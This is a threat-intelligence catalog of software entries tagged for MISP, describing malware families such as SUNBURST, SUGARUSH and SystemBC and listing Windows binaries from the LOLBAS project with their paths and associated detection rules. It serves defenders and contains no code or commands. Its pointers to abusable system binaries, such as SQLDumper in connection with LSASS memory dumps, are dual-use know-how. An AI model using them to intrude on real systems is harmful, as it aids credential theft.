This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Debugging utility included with Microsoft SQL.

Author: Oddvar Moe

Paths:
* C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
* C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe

Detection:
* Sigma: [proc_creation_win_lolbin_susp_sqldumper_activity.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml)
* Elastic: [credential_access_lsass_memdump_file_created.toml](https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml)
* Elastic: credential_access_cmdline_dump_tool.toml<sup>[[Sqldumper.exe - LOLBAS Project](/references/793d6262-37af-46e1-a6b5-a5262f4a749d)]</sup>

The tag is: misp-galaxy:software="Sqldumper"

sqlmap

[sqlmap](https://app.tidalcyber.com/software/96c224a6-6ca4-4ac1-9990-d863ec5a317a) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. <sup>[[sqlmap Introduction](https://app.tidalcyber.com/references/ac643245-d54f-470f-a393-26875c0877c8)]</sup>

The tag is: misp-galaxy:software="sqlmap"

Sqlps.exe - Associated Software

<sup>[[Sqlps.exe - LOLBAS Project](/references/31cc851a-c536-4cef-9391-d3c7d3eab64f)]</sup>

The tag is: misp-galaxy:software="Sqlps.exe - Associated Software"

Sqlps

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are PowerShell v2. Microsoft SQL Server\120 and 130 are PowerShell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatibility reasons.

Author: Oddvar Moe

Paths:
* C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
* C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
* C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe
* C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
* C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe

The tag is: misp-galaxy:software="Sqlps"

SQLRat

[SQLRat](https://app.tidalcyber.com/software/612f780a-239a-4bd0-a29f-63beadf3ed22) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) has been observed using it.<sup>[[Flashpoint FIN 7 March 2019](https://app.tidalcyber.com/references/b09453a3-c0df-4e96-b399-e7b34e068e9d)]</sup>

The tag is: misp-galaxy:software="SQLRat"

SQLToolsPS.exe - Associated Software

<sup>[[SQLToolsPS.exe - LOLBAS Project](/references/612c9569-80af-48d2-a853-0f6e3f55aa50)]</sup>

The tag is: misp-galaxy:software="SQLToolsPS.exe - Associated Software"

SQLToolsPS

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Tool included with Microsoft SQL that loads SQL Server cmdlets. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.

Author: Oddvar Moe

Paths: * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe

Detection:
* Sigma: [proc_creation_win_mssql_sqltoolsps_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml)
* Splunk: 2021-10-05-suspicious_copy_on_system32.md<sup>[[SQLToolsPS.exe - LOLBAS Project](/references/612c9569-80af-48d2-a853-0f6e3f55aa50)]</sup>

The tag is: misp-galaxy:software="SQLToolsPS"

Squirrel.exe - Associated Software

<sup>[[Squirrel.exe - LOLBAS Project](/references/952b5ca5-1251-4e27-bd30-5d55d7d2da5e)]</sup>

The tag is: misp-galaxy:software="Squirrel.exe - Associated Software"

Squirrel

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Author: Reegun J (OCBC Bank) - @reegun21

Paths: * %localappdata%\Microsoft\Teams\current\Squirrel.exe

Detection:
* Sigma: proc_creation_win_lolbin_squirrel.yml<sup>[[Squirrel.exe - LOLBAS Project](/references/952b5ca5-1251-4e27-bd30-5d55d7d2da5e)]</sup>

The tag is: misp-galaxy:software="Squirrel"

Squirrelwaffle

[Squirrelwaffle](https://app.tidalcyber.com/software/46943a69-0b19-4d3a-b2a3-1302e85239a3) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) and the [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) banking trojan.<sup>[[ZScaler Squirrelwaffle Sep 2021](https://app.tidalcyber.com/references/624a62db-f00f-45f9-89f6-2c3505b4979f)]</sup><sup>[[Netskope Squirrelwaffle Oct 2021](https://app.tidalcyber.com/references/5559895a-4647-438f-b3d5-6d6aa323a6f9)]</sup>

The tag is: misp-galaxy:software="Squirrelwaffle"

ssh.exe - Associated Software

<sup>[[ssh.exe - LOLBAS Project](/references/b1a9af1c-0cfc-4e8a-88ac-7d33cddc26a1)]</sup>

The tag is: misp-galaxy:software="ssh.exe - Associated Software"

ssh

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Ssh.exe is the OpenSSH-compatible client that can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.

Author: Akshat Pradhan

Paths: * c:\windows\system32\OpenSSH\ssh.exe

Detection:
* Sigma: [proc_creation_win_lolbin_ssh.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml)
* IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
* IOC: command line arguments specifying execution.<sup>[[ssh.exe - LOLBAS Project](/references/b1a9af1c-0cfc-4e8a-88ac-7d33cddc26a1)]</sup>

The tag is: misp-galaxy:software="ssh"

SslMM

The tag is: misp-galaxy:software="SslMM"

Starloader

[Starloader](https://app.tidalcyber.com/software/fc18e220-2200-4d70-a426-0700ba14c4c0) is a loader component that has been observed loading [Felismus](https://app.tidalcyber.com/software/c66ed8ab-4692-4948-820e-5ce87cc78db5) and associated tools. <sup>[[Symantec Sowbug Nov 2017](https://app.tidalcyber.com/references/14f49074-fc46-45d3-bf7e-30c896c39c07)]</sup>

The tag is: misp-galaxy:software="Starloader"

CANOPY - Associated Software

<sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup>

The tag is: misp-galaxy:software="CANOPY - Associated Software"

STARWHALE

[STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) is a Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6), possibly since at least November 2021; there is also a [STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) by UNC3313, which may be associated with [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6).<sup>[[Mandiant UNC3313 Feb 2022](https://app.tidalcyber.com/references/ac1a1262-1254-4ab2-a940-2d08b6558e9e)]</sup><sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup>

The tag is: misp-galaxy:software="STARWHALE"

DROPSHOT - Associated Software

The tag is: misp-galaxy:software="DROPSHOT - Associated Software"

StoneDrill

[StoneDrill](https://app.tidalcyber.com/software/9eee52a2-5ac1-4561-826c-23ec7fbc7876) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with APT33.<sup>[[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>

The tag is: misp-galaxy:software="StoneDrill"

Stordiag.exe - Associated Software

<sup>[[Stordiag.exe - LOLBAS Project](/references/5e52a211-7ef6-42bd-93a1-5902f5e1c2ea)]</sup>

The tag is: misp-galaxy:software="Stordiag.exe - Associated Software"

Stordiag

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Storage diagnostic tool

Author: Eral4m

Paths:

* c:\windows\system32\stordiag.exe
* c:\windows\syswow64\stordiag.exe

Detection:

* Sigma: [proc_creation_win_stordiag_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml)
* IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\<sup>[[Stordiag.exe - LOLBAS Project](/references/5e52a211-7ef6-42bd-93a1-5902f5e1c2ea)]</sup>

The tag is: misp-galaxy:software="Stordiag"

StreamEx

[StreamEx](https://app.tidalcyber.com/software/502b490c-2067-40a4-8f73-7245d7910851) is a malware family that has been used by [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. <sup>[[Cylance Shell Crew Feb 2017](https://app.tidalcyber.com/references/c0fe5d29-838b-4e91-bd33-59ab3dbcfbc3)]</sup>

The tag is: misp-galaxy:software="StreamEx"

StrifeWater

[StrifeWater](https://app.tidalcyber.com/software/dd8bb0a3-6cb1-412d-adeb-cbaae98462a9) is a remote-access tool that has been used by [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) in the initial stages of their attacks since at least November 2021.<sup>[[Cybereason StrifeWater Feb 2022](https://app.tidalcyber.com/references/30c911b2-9a5e-4510-a78c-c65e84398c7e)]</sup>

The tag is: misp-galaxy:software="StrifeWater"

W32.Stuxnet - Associated Software

<sup>[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)]</sup>

The tag is: misp-galaxy:software="W32.Stuxnet - Associated Software"

Stuxnet

[Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.<sup>[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)]</sup><sup>[[CISA ICS Advisory ICSA-10-272-01](https://app.tidalcyber.com/references/25b3c18c-e017-4773-91dd-b489220d4fcb)]</sup><sup>[[ESET Stuxnet Under the Microscope](https://app.tidalcyber.com/references/4ec039a9-f843-42de-96ed-185c4e8c2d9f)]</sup><sup>[[Langer Stuxnet](https://app.tidalcyber.com/references/76b99581-e94d-4e51-8110-80557474048e)]</sup> [Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) was discovered in 2010, with some components being used as early as November 2008.<sup>[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)]</sup>

The tag is: misp-galaxy:software="Stuxnet"

S-Type

The tag is: misp-galaxy:software="S-Type"

SUGARDUMP

[SUGARDUMP](https://app.tidalcyber.com/software/6ff7bf2e-286c-4b1b-92a0-1e5322870c59) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) campaign. The first known [SUGARDUMP](https://app.tidalcyber.com/software/6ff7bf2e-286c-4b1b-92a0-1e5322870c59) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.<sup>[[Mandiant UNC3890 Aug 2022](https://app.tidalcyber.com/references/7b3fda0b-d327-4f02-bebe-2b8974f9959d)]</sup>

The tag is: misp-galaxy:software="SUGARDUMP"

SUGARUSH

[SUGARUSH](https://app.tidalcyber.com/software/004c781a-3d7d-446b-9677-a042c8f6566e) is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. [SUGARUSH](https://app.tidalcyber.com/software/004c781a-3d7d-446b-9677-a042c8f6566e) was first identified during analysis of UNC3890’s [C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) campaign targeting Israeli companies, which began in late 2020.<sup>[[Mandiant UNC3890 Aug 2022](https://app.tidalcyber.com/references/7b3fda0b-d327-4f02-bebe-2b8974f9959d)]</sup>

The tag is: misp-galaxy:software="SUGARUSH"

Solorigate - Associated Software

<sup>[[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]</sup>

The tag is: misp-galaxy:software="Solorigate - Associated Software"

SUNBURST

[SUNBURST](https://app.tidalcyber.com/software/6b04e98e-c541-4958-a8a5-d433e575ce78) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least February 2020.<sup>[[SolarWinds Sunburst Sunspot Update January 2021](https://app.tidalcyber.com/references/1be1b6e0-1b42-4d07-856b-b6321c17bb88)]</sup><sup>[[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]</sup>

The tag is: misp-galaxy:software="SUNBURST"

SUNSPOT

[SUNSPOT](https://app.tidalcyber.com/software/66966a12-3db3-4e43-a7e8-6c6836ccd8fe) is an implant that injected the [SUNBURST](https://app.tidalcyber.com/software/6b04e98e-c541-4958-a8a5-d433e575ce78) backdoor into the SolarWinds Orion software update framework. It was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least February 2020.<sup>[[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)]</sup>

The tag is: misp-galaxy:software="SUNSPOT"

SUPERNOVA

[SUPERNOVA](https://app.tidalcyber.com/software/f02abaee-237b-4891-bb5d-30ca86dfc2c8) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://app.tidalcyber.com/software/f02abaee-237b-4891-bb5d-30ca86dfc2c8) may have been used by the China-based threat group SPIRAL.<sup>[[Guidepoint SUPERNOVA Dec 2020](https://app.tidalcyber.com/references/78fee365-ab2b-4823-8358-46c362be1ac0)]</sup><sup>[[Unit42 SUPERNOVA Dec 2020](https://app.tidalcyber.com/references/e884d0b5-f2a2-47cb-bb77-3acdac6b1790)]</sup><sup>[[SolarWinds Advisory Dec 2020](https://app.tidalcyber.com/references/4e8b908a-bdc5-441b-bc51-98dfa87f6b7a)]</sup><sup>[[CISA Supernova Jan 2021](https://app.tidalcyber.com/references/ce300d75-8351-4d7c-b280-7d5fbe17f9bb)]</sup><sup>[[Microsoft Analyzing Solorigate Dec 2020](https://app.tidalcyber.com/references/8ad72d46-ba2c-426f-bb0d-eb47723c8e11)]</sup>

The tag is: misp-galaxy:software="SUPERNOVA"

SVCReady

[SVCReady](https://app.tidalcyber.com/software/a8110f81-5ee9-5819-91ce-3a57aa330dcb) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://app.tidalcyber.com/groups/8951bff3-c444-4374-8a9e-b2115d9125b2) activity and [SVCReady](https://app.tidalcyber.com/software/a8110f81-5ee9-5819-91ce-3a57aa330dcb) distribution, including similarities in file names, lure images, and identical grammatical errors.<sup>[[HP SVCReady Jun 2022](https://app.tidalcyber.com/references/48d5ec83-f1b9-595c-bb9a-d6d5cc513a41)]</sup>

The tag is: misp-galaxy:software="SVCReady"

Sykipot

[Sykipot](https://app.tidalcyber.com/software/ae749f9c-cf46-42ce-b0b8-f0be8660e3f3) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://app.tidalcyber.com/software/ae749f9c-cf46-42ce-b0b8-f0be8660e3f3) hijacks smart cards on victims. <sup>[[Alienvault Sykipot DOD Smart Cards](https://app.tidalcyber.com/references/1a96544f-5b4e-4e1a-8db0-a989df9e4aaa)]</sup> The group using this malware has also been referred to as Sykipot. <sup>[[Blasco 2013](https://app.tidalcyber.com/references/46be6b77-ee2b-407e-bdd4-5a1183eda7f3)]</sup>

The tag is: misp-galaxy:software="Sykipot"

SynAck

[SynAck](https://app.tidalcyber.com/software/19ae8345-745e-4872-8a29-d56c8800d626) is a variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. <sup>[[SecureList SynAck Doppelgänging May 2018](https://app.tidalcyber.com/references/d9f0af0f-8a65-406b-9d7e-4051086ef301)]</sup> <sup>[[Kaspersky Lab SynAck May 2018](https://app.tidalcyber.com/references/bbb9bcb5-cd44-4dcb-a7e5-f6c4cf93f74f)]</sup>

The tag is: misp-galaxy:software="SynAck"

Syncappvpublishingserver.vbs - Associated Software

<sup>[[Syncappvpublishingserver.vbs - LOLBAS Project](/references/adb09226-894c-4874-a2e3-fb2c6de30173)]</sup>

The tag is: misp-galaxy:software="Syncappvpublishingserver.vbs - Associated Software"

Syncappvpublishingserver

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Script used related to app-v and publishing server

Author: Oddvar Moe

Paths:

* C:\Windows\System32\SyncAppvPublishingServer.vbs

Detection:

* Sigma: proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml<sup>[[Syncappvpublishingserver.vbs - LOLBAS Project](/references/adb09226-894c-4874-a2e3-fb2c6de30173)]</sup>

The tag is: misp-galaxy:software="Syncappvpublishingserver"

SyncAppvPublishingServer.exe - Associated Software

<sup>[[SyncAppvPublishingServer.exe - LOLBAS Project](/references/ce371df7-aab6-4338-9491-656481cb5601)]</sup>

The tag is: misp-galaxy:software="SyncAppvPublishingServer.exe - Associated Software"

SyncAppvPublishingServer

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by App-v to get App-v server lists

Author: Oddvar Moe

Paths:

* C:\Windows\System32\SyncAppvPublishingServer.exe
* C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

Detection:

* Sigma: [posh_ps_syncappvpublishingserver_exe.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml)
* Sigma: [posh_pm_syncappvpublishingserver_exe.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml)
* Sigma: [proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml)
* IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed<sup>[[SyncAppvPublishingServer.exe - LOLBAS Project](/references/ce371df7-aab6-4338-9491-656481cb5601)]</sup>

The tag is: misp-galaxy:software="SyncAppvPublishingServer"

SYNful Knock

[SYNful Knock](https://app.tidalcyber.com/software/69ab291d-5066-4e47-9862-1f5c7bac7200) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim’s network and provide new capabilities to the adversary.<sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup><sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

The tag is: misp-galaxy:software="SYNful Knock"

Sys10

The tag is: misp-galaxy:software="Sys10"

SYSCON

[SYSCON](https://app.tidalcyber.com/software/ea556a8d-4959-423f-a2dd-622d0497d484) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://app.tidalcyber.com/software/ea556a8d-4959-423f-a2dd-622d0497d484) has been delivered by the [CARROTBALL](https://app.tidalcyber.com/software/84bb4068-b441-435e-8535-02a458ffd50b) and [CARROTBAT](https://app.tidalcyber.com/software/aefa893d-fc6e-41a9-8794-2700049db9e5) droppers.<sup>[[Unit 42 CARROTBAT November 2018](https://app.tidalcyber.com/references/6986a64a-5fe6-4697-b70b-79cccaf3d730)]</sup><sup>[[Unit 42 CARROTBAT January 2020](https://app.tidalcyber.com/references/b65442ca-18ca-42e0-8be0-7c2b66c26d02)]</sup>

The tag is: misp-galaxy:software="SYSCON"

Syssetup.dll - Associated Software

<sup>[[Syssetup.dll - LOLBAS Project](/references/3bb7027f-7cbb-47e7-8cbb-cf45604669af)]</sup>

The tag is: misp-galaxy:software="Syssetup.dll - Associated Software"

Syssetup

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows NT System Setup

Author: LOLBAS Team

Paths:

* c:\windows\system32\syssetup.dll
* c:\windows\syswow64\syssetup.dll

Detection:

* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)
* Splunk: detect_rundll32_application_control_bypass_syssetup.yml<sup>[[Syssetup.dll - LOLBAS Project](/references/3bb7027f-7cbb-47e7-8cbb-cf45604669af)]</sup>

The tag is: misp-galaxy:software="Syssetup"

Coroxy - Associated Software

The tag is: misp-galaxy:software="Coroxy - Associated Software"

DroxiDat - Associated Software

The tag is: misp-galaxy:software="DroxiDat - Associated Software"

SystemBC

SystemBC is a commodity backdoor malware used as a Tor proxy and remote access Trojan (RAT). It was used during the high-profile 2021 Colonial Pipeline DarkSide ransomware attack and has since been used as a persistence & lateral movement tool during other ransomware compromises, including intrusions involving Ryuk, Egregor, and Play.<sup>[[BlackBerry SystemBC June 10 2021](/references/08186ff9-6ca5-4c09-b5e7-b883eb15fdba)]</sup><sup>[[Sophos SystemBC December 16 2020](/references/eca1301f-deeb-4a97-8c4e-e61210706116)]</sup><sup>[[WithSecure SystemBC May 10 2021](/references/4004e072-9e69-4e81-a2b7-840e106cf3d9)]</sup><sup>[[Trend Micro Play Ransomware September 06 2022](/references/ed02529c-920d-4a92-8e86-be1ed7083991)]</sup> According to Mandiant’s 2023 M-Trends report, SystemBC was the second most frequently seen malware family in 2022 after only Cobalt Strike Beacon.<sup>[[TechRepublic M-Trends 2023](/references/1347e21e-e77d-464d-bbbe-dc4d3f2b07a1)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/systembc/

The tag is: misp-galaxy:software="SystemBC"

Systeminfo

[Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) is a Windows utility that can be used to gather detailed information about a computer. <sup>[[TechNet Systeminfo](https://app.tidalcyber.com/references/5462ba66-6e26-41c2-bc28-6c19085d4469)]</sup>

The tag is: misp-galaxy:software="Systeminfo"

HyperSSL - Associated Software

<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="HyperSSL - Associated Software"

Soldier - Associated Software

<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="Soldier - Associated Software"

FOCUSFJORD - Associated Software

<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="FOCUSFJORD - Associated Software"

SysUpdate

[SysUpdate](https://app.tidalcyber.com/software/148d587c-3b1e-4e71-bdfb-8c37005e7e77) is a backdoor written in C++ that has been used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2020.<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="SysUpdate"

T9000

[T9000](https://app.tidalcyber.com/software/c5647cc4-0d46-4a41-8591-9179737747a2) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. <sup>[[FireEye admin@338 March 2014](https://app.tidalcyber.com/references/6a37e6eb-b767-4b10-9c39-660a42b19ddd)]</sup> <sup>[[Palo Alto T9000 Feb 2016](https://app.tidalcyber.com/references/d7eefe85-86cf-4b9d-bf70-f16c5a0227cc)]</sup>

The tag is: misp-galaxy:software="T9000"

Tactical RMM

According to joint Cybersecurity Advisory AA23-320A (November 2023), Tactical RMM is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Tactical RMM"

Taidoor

[Taidoor](https://app.tidalcyber.com/software/9334df79-9023-44bb-bc28-16c1f07b836b) is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.<sup>[[CISA MAR-10292089-1.v2 TAIDOOR August 2021](https://app.tidalcyber.com/references/0ae18fda-cc88-49f4-8e85-7b63044579ea)]</sup> [Taidoor](https://app.tidalcyber.com/software/9334df79-9023-44bb-bc28-16c1f07b836b) has primarily been used against Taiwanese government organizations since at least 2010.<sup>[[TrendMicro Taidoor](https://app.tidalcyber.com/references/3d703dfa-97c5-498f-a712-cb4995119297)]</sup>

The tag is: misp-galaxy:software="Taidoor"

Tailscale

According to joint Cybersecurity Advisory AA23-320A (November 2023), Tailscale is a publicly available, legitimate tool that "provides virtual private networks (VPNs) to secure network communications". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Tailscale"

TAINTEDSCRIBE

[TAINTEDSCRIBE](https://app.tidalcyber.com/software/1548c94a-fb4d-43d8-9956-ea26f5cc552f) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). It was first reported in May 2020.<sup>[[CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020](https://app.tidalcyber.com/references/b9946fcc-592a-4c54-b504-4fe5050704df)]</sup>

The tag is: misp-galaxy:software="TAINTEDSCRIBE"

TajMahal

